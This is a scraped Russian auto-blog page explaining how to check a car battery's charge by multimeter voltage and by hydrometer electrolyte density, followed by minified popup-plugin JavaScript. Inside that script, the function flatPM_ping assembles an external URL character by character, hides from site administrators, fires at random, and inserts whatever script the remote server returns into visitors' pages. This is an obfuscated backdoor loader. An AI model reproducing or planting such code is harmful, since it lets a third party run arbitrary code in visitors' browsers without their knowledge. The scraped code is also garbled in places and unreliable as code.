  • Подсоединяем провода от мультиметра к клеммам аккумулятора – черный провод к минусовой клемме, красный к плюсовой (иногда провода одинакового цвета).

  • Снимаем показатели напряжения.

По напряжению:

  • Полностью заряженная батарея имеет напряжение в 12,7 (редко 13,2) Вольта, значит АКБ не нуждается в заряде.
  • Если напряжение от 12,1 до 12,4В то разряд примерно на половину.
  • Если показатель в 11,6 – 11,7В, то это глубокий разряд! Нужно срочно заряжать ваш АКБ, да и движок он запустит вряд ли.

Сейчас небольшое видео.

Проверка плотности электролита

Если еще один способ проверки заряда аккумулятора, но он также не очень популярный – это замер плотности электролита. Но нам опять е понадобиться еще одно устройство – ареометр. Все дело в том — что заряженная батарея имеет плотность электролита примерно в 1,24 — 1,27 г/см3. Замеряются плотность как раз ареометром – он погружается в «банку» батареи и в него закачивают электролит, дальше либо «поплавок», либо «палочки» внутри всплывают до нужного значения.

  • 1,24 – 1,27 г/см3 ваша батарея заряжена полностью
  • 1,20 г/см3 – разряд примерно 25%, нужна небольшая подзарядка
  • 1,16 г/см3 – разряд на 50%
  • 1,08 – 1,10 г/см3 – полный или глубокий разряд, нужно срочно заряжать!

Минус этого метода в том, что сейчас многие батареи – необслуживаемые. То есть, нельзя разобрать и погрузить в электролит ареометр.

Если подвести итог — проверка заряда мультиметром, самый простой и легко выполнимый метод, однако он не всегда может обрисовать полную картину происходящего, ведь вы не можете подать нагрузку, которую дает стартер. Самый точный метод все же – нагрузочная вилка, но про это будет дополнительная статья. Так что следите за обновление блога.

НА этом заканчиваю, читайте наш АВТОБЛОГ.

(11 голосов, средний: 4,36 из 5)

Похожие новости

Как прикурить аккумулятор от другой машины. Можно ли это делать .

Зеленая лампочка на аккумуляторе (встроенный индикатор). Что озн.

Какой фирмы (марки) выбрать аккумулятор для автомобиля. Мой рейт.

голоса
Рейтинг статьи
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};
Яндекс.Метрика